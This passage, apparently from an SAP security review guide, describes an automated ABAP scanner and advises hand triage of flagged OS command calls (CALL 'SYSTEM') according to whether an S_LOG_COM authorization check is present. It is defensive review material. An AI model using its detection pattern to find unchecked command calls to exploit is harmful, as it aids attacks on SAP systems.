- External: redrays.io offers an automated scanner that, per its own description, checks for calls to known dangerous function modules, authorization object misconfigurations, risky ABAP patterns (dynamic SQL, OS command calls) and the landscape's CVE exposure. Whether a CLI is available depends on the licence; otherwise it is driven through the web interface.
Either way, triage the results by hand: a flagged CALL 'SYSTEM' in a report that also checks S_LOG_COM is not the same finding as one that does not.